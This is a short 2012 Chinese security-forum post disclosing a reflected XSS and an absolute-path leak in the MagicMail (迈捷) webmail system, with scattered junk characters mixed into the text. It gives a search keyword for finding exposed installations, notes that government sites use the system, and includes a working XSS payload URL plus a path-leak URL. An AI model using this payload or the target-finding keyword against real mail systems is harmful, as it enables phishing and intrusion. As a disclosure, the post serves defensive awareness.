找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1920|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
* T* I' a1 {+ p9 \; f/ o( G& t
) W: b1 E  s# p$ ]) \& X1 ^2 Y " g) o' B7 U4 i, m- S8 \
包含  一个反射性XSS  以及  绝对路径泄漏
2 J6 p& b1 a7 M$ A, x" H9 @看了看 貌似全部是linux的。5 z8 K# }  w  g8 I- u
- ?  x' f0 w, I& r& s
关键字:迈捷邮件系统 by MagicMail  B" j8 d2 `/ c. E; u1 m8 m0 }
9 T( L6 `, o5 ]  C4 z, J" M" B
可以看到很多政府网站都用这个邮件系统
. |* G, p- r/ c4 q; K) j0 W1 t' L6 P
2 T% D6 V! @0 i6 R2 Q0 C0 @) g, I绝对路径 http://madman.in/index.php?login_type=declare&language=
, S& X; W# I/ D# O' P9 c$ R) L/ y8 \2 f2 _% C

* D6 b: t: r% f; P+ p  b+ l
2 n" f2 Y6 `; E3 ^XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E, e; Z+ c  F5 H* h4 D. ^( |5 g8 R3 I. \( L

0 D: n1 O6 R( a2 C2 s* I& R+ x+ p" P# v" ?% R

; A# q: z& o  v; V+ j: W! ~, P虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
/ ]0 ?6 b8 x3 [5 r: O/ ?% w) \$ J
8 B! h$ \' M" ^, S; y. T修复方案:看官方补丁吧。
3 h: H$ @+ W9 t; J6 G& |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表